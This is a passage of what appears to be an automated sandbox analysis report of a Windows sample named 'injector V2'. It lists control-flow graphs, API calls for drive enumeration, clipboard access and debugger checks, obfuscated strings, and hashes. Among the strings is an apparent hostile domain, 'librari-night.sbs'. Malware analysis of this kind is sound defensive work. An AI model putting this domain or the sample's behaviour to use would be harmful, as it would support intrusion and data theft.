                                                                                                                            control_flow_graph 306 4251e0-42523f 307 425240-42525e 306->307 307->307 308 425260-4252a9 307->308 310 4252b0-4252dd 308->310 310->310 311 4252df-4252e9 310->311 312 4252f0-4252f6 311->312 313 425327 311->313 314 425444-425451 311->314 315 425434-42543b 311->315 316 425345-42534e 311->316 317 425338-425344 311->317 318 42532f-425335 call 4086d0 311->318 319 4252f8-4252fd 312->319 320 4252ff 312->320 313->318 321 425453-425458 314->321 322 42545a 314->322 315->314 324 425350-425355 316->324 325 425357 316->325 318->317 327 425302-425320 call 4086c0 319->327 320->327 328 425461-42550f call 4086c0 321->328 322->328 326 42535e-425399 call 4086c0 324->326 325->326 336 4253a0-4253b2 326->336 327->313 327->314 327->315 327->316 327->317 327->318 337 425510-425547 328->337 336->336 338 4253b4-4253bc 336->338 337->337 340 425549-425555 337->340 341 4253e1-4253ed 338->341 342 4253be-4253c3 338->342 343 425571-425586 340->343 344 425557-42555f 340->344 346 425411-42541c call 441000 341->346 347 4253ef-4253f3 341->347 345 4253d0-4253df 342->345 349 4255a1-4255c1 GetLogicalDrives call 441000 343->349 350 425588-42558f 343->350 348 425560-42556f 344->348 345->341 345->345 355 425421-42542d 346->355 351 425400-42540f 347->351 348->343 348->348 357 4255e0-425602 349->357 358 425700-425726 349->358 359 425850-425859 call 4086d0 349->359 360 425840 349->360 361 425846 349->361 362 425827 349->362 363 4255da 349->363 364 4255c8-4255d2 349->364 365 42582d-425836 call 4086d0 349->365 353 425590-42559f 350->353 351->346 351->351 353->349 353->353 355->314 355->315 366 425610-425624 357->366 368 425730-425744 358->368 360->361 361->359 362->365 363->357 364->363 365->360 366->366 370 425626-4256bb 366->370 368->368 372 425746-4257d8 368->372 374 4256c0-4256e4 370->374 375 4257e0-425804 372->375 374->374 376 4256e6-4256ff call 422ff0 374->376 375->375 377 425806-42581f call 422ff0 375->377 376->358 377->362
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: /SB$<=
                                                                                                                            • API String ID: 0-491382847
                                                                                                                            • Opcode ID: c888f38bb739e0c2553ef12911f30f1cf85fc8de16b323ebd9cbd027a09d05ba
                                                                                                                            • Instruction ID: 995443a2f928c703a78138b241af00773a5b73620a1b8667a21179c4f3636e01
                                                                                                                            • Opcode Fuzzy Hash: c888f38bb739e0c2553ef12911f30f1cf85fc8de16b323ebd9cbd027a09d05ba
                                                                                                                            • Instruction Fuzzy Hash: 41F1A7B46083909FE310DF25E89162FBBF1EF92354F44892DF5C59B291D7788806CB9A

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 382 40dd2b-40dd63 call 434d70 call 409d80 CoUninitialize 387 40dd70-40dd94 382->387 387->387 388 40dd96-40ddaf 387->388 389 40ddb0-40ddfc 388->389 389->389 390 40ddfe-40de4f 389->390 391 40de50-40de8f 390->391 391->391 392 40de91-40de9c 391->392 393 40debb-40decc 392->393 394 40de9e-40dea2 392->394 396 40dedb-40dee3 393->396 397 40dece-40decf 393->397 395 40deb0-40deb9 394->395 395->393 395->395 399 40dee5-40dee9 396->399 400 40defd 396->400 398 40ded0-40ded9 397->398 398->396 398->398 401 40def0-40def9 399->401 402 40df00-40df0a 400->402 401->401 403 40defb 401->403 404 40df1b-40df23 402->404 405 40df0c-40df0f 402->405 403->402 407 40df25-40df26 404->407 408 40df3b-40df47 404->408 406 40df10-40df19 405->406 406->404 406->406 409 40df30-40df39 407->409 410 40df61-40e017 408->410 411 40df49-40df4b 408->411 409->408 409->409 413 40e020-40e054 410->413 412 40df50-40df5d 411->412 412->412 414 40df5f 412->414 413->413 415 40e056-40e06f 413->415 414->410 416 40e070-40e0a4 415->416 416->416 417 40e0a6-40e0e0 call 40bc40 416->417
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Uninitialize
                                                                                                                            • String ID: librari-night.sbs$IK
                                                                                                                            • API String ID: 3861434553-2771342554
                                                                                                                            • Opcode ID: 67c7073d86484a4ce9609fb0cd878a87cfb6a811387be44cac6132087faa4ed7
                                                                                                                            • Instruction ID: 1f6cc4740e552a2cb060ab705c111998680bbd669b24ad068797bc7423acbed1
                                                                                                                            • Opcode Fuzzy Hash: 67c7073d86484a4ce9609fb0cd878a87cfb6a811387be44cac6132087faa4ed7
                                                                                                                            • Instruction Fuzzy Hash: 82B1F271605B829FD319CF35C4A0262BFA1FFA7300F18826DC0D64BB95C739A816CB95

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 420 409d80-409d8e 421 409d94-409e09 call 4064b0 call 4086c0 420->421 422 40a1bf 420->422 428 409e10-409e2e 421->428 423 40a1c1-40a1cd 422->423 428->428 429 409e30-409e51 call 4096b0 428->429 432 409e60-409e74 429->432 432->432 433 409e76-409e93 call 4096b0 432->433 436 409ea0-409eb4 433->436 436->436 437 409eb6-409eef call 4096b0 436->437 440 409ef0-409f0e 437->440 440->440 441 409f10-409f1f 440->441 442 409f20-409f49 441->442 442->442 443 409f4b-409f7a call 4096b0 442->443 446 409f80-409fd2 443->446 446->446 447 409fd4-40a09f call 409940 446->447 450 40a0a0-40a0be 447->450 450->450 451 40a0c0-40a0c8 450->451 452 40a0f1-40a0fc 451->452 453 40a0ca-40a0d2 451->453 455 40a121-40a14f 452->455 456 40a0fe-40a101 452->456 454 40a0e0-40a0ef 453->454 454->452 454->454 458 40a150-40a180 455->458 457 40a110-40a11f 456->457 457->455 457->457 458->458 459 40a182-40a197 call 40c470 458->459 461 40a19c-40a1bd call 4086d0 459->461 461->423
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: F5DEADD4C3E4B5B74AFF5ADEC9E6BD77$T$[5]
                                                                                                                            • API String ID: 0-3703786218
                                                                                                                            • Opcode ID: 8d8c258e38e4277b3b45250506bdce6ef36cede89dec5a79bcc6374f8b6e18e0
                                                                                                                            • Instruction ID: 8f4bdf5d16c9c2d546d54f3c6f4ec71153cf5cc2fc1aca937f1041ca1bbf6e96
                                                                                                                            • Opcode Fuzzy Hash: 8d8c258e38e4277b3b45250506bdce6ef36cede89dec5a79bcc6374f8b6e18e0
                                                                                                                            • Instruction Fuzzy Hash: 24B1F0B01083808FE314DF25D891A6BBBE5EB92318F14892DE1D59B392D779C84ACB57

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 471 440e40-440e4b 472 440e50-440e59 471->472 472->472 473 440e5b-440e62 472->473 474 440e64-440e69 473->474 475 440e6b 473->475 476 440e6e-440e98 call 4086c0 474->476 475->476 479 440eb1-440f37 476->479 480 440e9a-440e9f 476->480 482 440f40-440f85 479->482 481 440ea0-440eaf 480->481 481->479 481->481 482->482 483 440f87-440f92 482->483 484 440f94-440f9f 483->484 485 440fe7-440ff9 call 4086d0 483->485 487 440fa0-440fa7 484->487 489 440fb0-440fb6 487->489 490 440fa9-440fac 487->490 489->485 491 440fb8-440fdb call 43e730 489->491 490->487 492 440fae 490->492 494 440fe0-440fe5 491->494 492->485 494->485
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$Pt1
                                                                                                                            • API String ID: 0-1130223541
                                                                                                                            • Opcode ID: e9700b4b45cf00256351c57a55995cf3165105985d229c13d081b9ddf8767056
                                                                                                                            • Instruction ID: 3b96cd8c00d660fecdf5ffcb71e02195ff58b354c3115b327a8482f9e356b869
                                                                                                                            • Opcode Fuzzy Hash: e9700b4b45cf00256351c57a55995cf3165105985d229c13d081b9ddf8767056
                                                                                                                            • Instruction Fuzzy Hash: 364138B2A143008BD714CF54DC96B2FB6E1EFD5318F18892DE6855B3D1E3788818879A

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 521 40a210-40a22f 522 40a230-40a280 521->522 522->522 523 40a282-40a2be 522->523 524 40a2c0-40a302 523->524 524->524 525 40a304-40a30b 524->525 526 40a30e-40a33d call 43d7f0 525->526
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ps$wq
                                                                                                                            • API String ID: 0-14304199
                                                                                                                            • Opcode ID: 836d7e778ad7567a485cedb3d972227d3ad79c2e24925e3b1eef8f231affeee0
                                                                                                                            • Instruction ID: 83fd5b6b3e6089e8b36cb791e143624f13b196c6ff22f0ffa32a903d6d8b40a6
                                                                                                                            • Opcode Fuzzy Hash: 836d7e778ad7567a485cedb3d972227d3ad79c2e24925e3b1eef8f231affeee0
                                                                                                                            • Instruction Fuzzy Hash: BF318BB3A0A3514FE318CF21EC4475B7B93EBC6304F19443CD4C12B245DA789A058797
                                                                                                                            APIs
                                                                                                                            • LdrInitializeThunk.NTDLL(00441182,005C003F,00000008,00000018,?), ref: 0043E75E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 044ed3062513c8418d971257276b09ab7cfaded0d577b38fcb0c8b8ddc6286a6
                                                                                                                            • Instruction ID: 0c372610f353c8605f5e7fd7bba33ebd5ab0f652ef33fd65444eca90d4c39493
                                                                                                                            • Opcode Fuzzy Hash: 044ed3062513c8418d971257276b09ab7cfaded0d577b38fcb0c8b8ddc6286a6
                                                                                                                            • Instruction Fuzzy Hash: 3E918872A087118BD318CF24D89162BF7E2FFD5314F19853EE9965B391D6B8AC01CB86
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ec3836bce5497a66b8f94ee4e71b0f16e8bca157487e32a3c7f418225fb72d93
                                                                                                                            • Instruction ID: 2b0430c271c9b5eae8cb4bce8db70ca11b03d7caf136ae99abfe995133d3dde6
                                                                                                                            • Opcode Fuzzy Hash: ec3836bce5497a66b8f94ee4e71b0f16e8bca157487e32a3c7f418225fb72d93
                                                                                                                            • Instruction Fuzzy Hash: 7DD0C93D549440CFC786CFA4FDA64B9B678EB0F2057142035E643F32A0C63098098A5E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 61b0b7c5971dac2479500af13eefb4f5b6c1a49e249cd5cb8b50aa8d0d297101
                                                                                                                            • Instruction ID: 3e2cdea992486101f34cf5083b39ee38ece70d7193610c8e0699b2112366faae
                                                                                                                            • Opcode Fuzzy Hash: 61b0b7c5971dac2479500af13eefb4f5b6c1a49e249cd5cb8b50aa8d0d297101
                                                                                                                            • Instruction Fuzzy Hash: 6DD09E795454408BC7469FA4FD9A479B638EB4F6157046024E542E32A0C62054098B2D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c1322d097e5907d7e55f5e0df6a24c851ad753793f8c9f6c63ed275507782845
                                                                                                                            • Instruction ID: 99e4cf4108bdef78bc6d4e55a13f18f0ae0d33f48a2b74cd41bf2555b8a9b505
                                                                                                                            • Opcode Fuzzy Hash: c1322d097e5907d7e55f5e0df6a24c851ad753793f8c9f6c63ed275507782845
                                                                                                                            • Instruction Fuzzy Hash: 35D01238548040CFC745CF54FD92578F778AB0F3057102035D643F32A0C530A8088A0D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 133aae2ae5085d40c7b83a781516660c9fb4f57316b28fe5cd73c2ccec925a5d
                                                                                                                            • Instruction ID: b0d62b176e0f3165092ce7e9369562274ab6ad861ba434518bc02396fa9688a8
                                                                                                                            • Opcode Fuzzy Hash: 133aae2ae5085d40c7b83a781516660c9fb4f57316b28fe5cd73c2ccec925a5d
                                                                                                                            • Instruction Fuzzy Hash: 1FC04C38648140CAC244CF54B9A2570A668574F60971130398657F3291C56094058A4E

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 615 43c3f0-43c401 616 43c487-43c48d 615->616 617 43c408-43c41b 615->617 618 43c420-43c473 617->618 618->618 619 43c475-43c481 RtlFreeHeap 618->619 619->616
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043C481
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: dfa04b971be56a3f496434651394ba16dcfc8b17bbb23839e04d0d3b502ff23c
                                                                                                                            • Instruction ID: 111e647c145c5c6d903aa5d72b1bb2868f15d56f955ecf3101938e586af64af9
                                                                                                                            • Opcode Fuzzy Hash: dfa04b971be56a3f496434651394ba16dcfc8b17bbb23839e04d0d3b502ff23c
                                                                                                                            • Instruction Fuzzy Hash: A201647BE1422047C324DB29AC92627BBCAEBC8326F1A817DE8C86BB80D5354C0187D1

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 620 43c380-43c399 621 43c3a0-43c3c9 620->621 621->621 622 43c3cb-43c3e1 RtlAllocateHeap 621->622
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043C3D7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 57dfbf7ae8b9c37702835af5e25cb6159b62ed1d8d311c8576f461731b9a2958
                                                                                                                            • Instruction ID: 2ebc20970ae16cb68a85b1019dd10c58e6d526718b52d903feeca6e90b438f18
                                                                                                                            • Opcode Fuzzy Hash: 57dfbf7ae8b9c37702835af5e25cb6159b62ed1d8d311c8576f461731b9a2958
                                                                                                                            • Instruction Fuzzy Hash: 2BF027315286604BD3049728EC90B7B7E959FAA215F14846CE8D51B79AD9204C56CB93
                                                                                                                            APIs
                                                                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CF56
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeSecurity
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 640775948-0
                                                                                                                            • Opcode ID: affde1bad8182852e4cd21517175da01bad444f3f9fc92db70567a123aa16cc1
                                                                                                                            • Instruction ID: 41b6cfea10fe4551602fae9163690755373fa1872f85b47ca5d4b6a8109e8c35
                                                                                                                            • Opcode Fuzzy Hash: affde1bad8182852e4cd21517175da01bad444f3f9fc92db70567a123aa16cc1
                                                                                                                            • Instruction Fuzzy Hash: 44E05E39BC834067F6254718EC43F84324253C2B21F388324B311EE7D8CAF8A502460C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: J)$JASI$L$d$i}kt$vpnv$wuqt$xtjv
                                                                                                                            • API String ID: 0-910791096
                                                                                                                            • Opcode ID: 2ec4ca88ff2d5aa5af5594b98cd87ae6a10c0329ed7272a3d9ab2dea513f8b43
                                                                                                                            • Instruction ID: 61801bfd89876edb2463504a4c74d84c79e256b248065fad792b73f7bee4edb5
                                                                                                                            • Opcode Fuzzy Hash: 2ec4ca88ff2d5aa5af5594b98cd87ae6a10c0329ed7272a3d9ab2dea513f8b43
                                                                                                                            • Instruction Fuzzy Hash: 73B1F37164C3918BD3218F2994A036BFFE0AFD3740F184A6DE4D55B392C379894ACB96
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1647500905-0
                                                                                                                            • Opcode ID: 384f96128a328fc7c87953e0083ad73078b807d0ac5559575d985810506fa819
                                                                                                                            • Instruction ID: 9c4d3531f4a974c9cb7c531ea8ebd4f342171b214b38d49ff762de2dd6fc903f
                                                                                                                            • Opcode Fuzzy Hash: 384f96128a328fc7c87953e0083ad73078b807d0ac5559575d985810506fa819
                                                                                                                            • Instruction Fuzzy Hash: CC5136B1D04B518BC710AB7CD84539EBFA0AB46314F09873AD8E49B3C1D338A91187D7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: [`Fz$kPTV$o{So$pdii$uwIt$|dyh
                                                                                                                            • API String ID: 0-3714002177
                                                                                                                            • Opcode ID: 88f6abfbbee54edd5f7a388fe6f33cab86e40b814a56af5e2b7c7ba76f2a55de
                                                                                                                            • Instruction ID: bf03b88ff62df5432f1dc3f85db82afbc6545c63de8c46ca4a00c2da7cdac4b2
                                                                                                                            • Opcode Fuzzy Hash: 88f6abfbbee54edd5f7a388fe6f33cab86e40b814a56af5e2b7c7ba76f2a55de
                                                                                                                            • Instruction Fuzzy Hash: 16520F71604B518FC731CF39D880617BBE2BF96314F588A6ED4E68BB92D738A406CB54
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: G0w$PQ
                                                                                                                            • API String ID: 0-4120197096
                                                                                                                            • Opcode ID: e5ebacef2600d9c26a7e9012af8447629990bb12c1cf384527168c1a49cc6a74
                                                                                                                            • Instruction ID: 897f4262f007e60a444c41210f1be547cfde9536a9330eb901eb7ed26c8658e5
                                                                                                                            • Opcode Fuzzy Hash: e5ebacef2600d9c26a7e9012af8447629990bb12c1cf384527168c1a49cc6a74
                                                                                                                            • Instruction Fuzzy Hash: 6CB114B56083508BD3209F25EC8575BBBE2EFD2304F14892DE5C49B355EB788906CB87
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00B4EB3E: HeapAlloc.KERNEL32(00000008,?,00000000,?,00B4CD28,00000001,00000364,00000000,FFFFFFFF,000000FF,?,?,00B4E421,00B4DC80), ref: 00B4EB7F
                                                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B4F821
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00B4F915
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00B4F954
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00B4F987
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2701053895-0
                                                                                                                            • Opcode ID: 6bd40e9fe17bc5739f17ae36b7b0b574dfe9b9849a904791179c580e55637d64
                                                                                                                            • Instruction ID: 662f6c41c5cede628a7c8078034f5fcfa6c2936ac0f45f96d30f1d670f3842ad
                                                                                                                            • Opcode Fuzzy Hash: 6bd40e9fe17bc5739f17ae36b7b0b574dfe9b9849a904791179c580e55637d64
                                                                                                                            • Instruction Fuzzy Hash: 3591E77190525AAFDF24AF28DC89ABEBBF9DF45304F1441E9E40997211DA358F81AF10
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B496BB
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00B49787
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B497A7
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00B497B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 254469556-0
                                                                                                                            • Opcode ID: 3eb1fcac3bba856d3eb4b39082b71cb6ea4b334ed7d168fd5e985e099eff3e37
                                                                                                                            • Instruction ID: ca03c3964246066d95ffd6abfea1d31a0c15c33ffc1fe09476ad374cbbd18999
                                                                                                                            • Opcode Fuzzy Hash: 3eb1fcac3bba856d3eb4b39082b71cb6ea4b334ed7d168fd5e985e099eff3e37
                                                                                                                            • Instruction Fuzzy Hash: 8C31E4B59453189BDB10EFA4D9897CDBBF8AF18300F1041EAE40DAB250EB719B859F45
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID: KJML
                                                                                                                            • API String ID: 2994545307-719402181
                                                                                                                            • Opcode ID: 3df7ed2c8a9dbe20235a181e964fae2686717c0acd2c38c0e30ad4773c2f8834
                                                                                                                            • Instruction ID: 8335f327d513369dcfb9834a600e7f34c22606be92fc97c0a4a2a4726be44bae
                                                                                                                            • Opcode Fuzzy Hash: 3df7ed2c8a9dbe20235a181e964fae2686717c0acd2c38c0e30ad4773c2f8834
                                                                                                                            • Instruction Fuzzy Hash: 0691E4B5A057018BE714DF19C890A2BB7F1FF99704F05842EE9869B361DB34EC51CB46
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID: 5|iL
                                                                                                                            • API String ID: 2994545307-1880071150
                                                                                                                            • Opcode ID: 67512c5ddbba3dcc724686a72749b8ade885c9fdba3e8d8f4ddba7c24cdba7de
                                                                                                                            • Instruction ID: df2ebe172a064403b9acf8916c0b5d6c1afc5a8f51932319c10438ba35789a9f
